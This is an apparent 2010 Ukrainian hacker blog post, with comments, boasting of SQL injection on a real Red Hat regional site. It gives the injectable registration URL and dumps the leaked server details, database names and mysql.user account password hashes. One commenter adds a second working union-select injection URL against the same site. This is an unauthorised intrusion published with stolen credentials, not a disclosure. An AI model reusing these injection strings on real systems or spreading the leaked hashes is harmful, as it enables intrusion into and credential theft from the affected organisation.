Home > Вразливості \ vulnerabilities > Знімаємо капелюха або .redhat.com sql-inj ;-)

Знімаємо капелюха або .redhat.com sql-inj ;-)

April 14th, 2010 snake Leave a comment Go to comments

Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.

Не буду тягнуть кота за яйця:

http://www.es.redhat.com/training/register.php?course=EX333&date=20101119+скуля--+&country=BE3&ref_id=


@@tmpdir: /tmp/
@@basedir: /usr/
version(): 5.0.77-log
database(): redhateurope
user(): www@localhost
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu (що не дивно ))))

redhatapac
redhatcn
test
email
redhates
_orms
redhatfr
box_us
redhatin
redhatbr
redhatit
redhatde
redhatkr
mysql
redhateurope
information_schema
drupal
redhatglobal
redhatcz
redhatlatam

mysql.user
www:*49D3CEBD189B8C5D4A47C975133BB2357A327585
repl:*F317577FF00A2A4112982CAE6A174DF23557C02F
root:*F317577FF00A2A4112982CAE6A174DF23557C02F
drupal:*7AFEAE5774E672996251E09B946CB3953FC67656


Categories: Вразливості \ vulnerabilities Tags: ,
  1. halk
    April 16th, 2010 at 06:56 | #1
    Reply | Quote

    навкруги одні хакери і горе-програмісти =

  2. DSU
    April 18th, 2010 at 01:14 | #2
    Reply | Quote

    Гг угу, наш девиз по белой шляпе на каждый комп ;)

  3. warlok
    April 20th, 2010 at 01:20 | #3
    Reply | Quote

    привiт, я теж знайшов там SQLi тiльки с виводом на сторiнку. =)
    _ttp://www.es.redhat.com/news/article/3027+and+5=4+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13.html

  1. No trackbacks yet.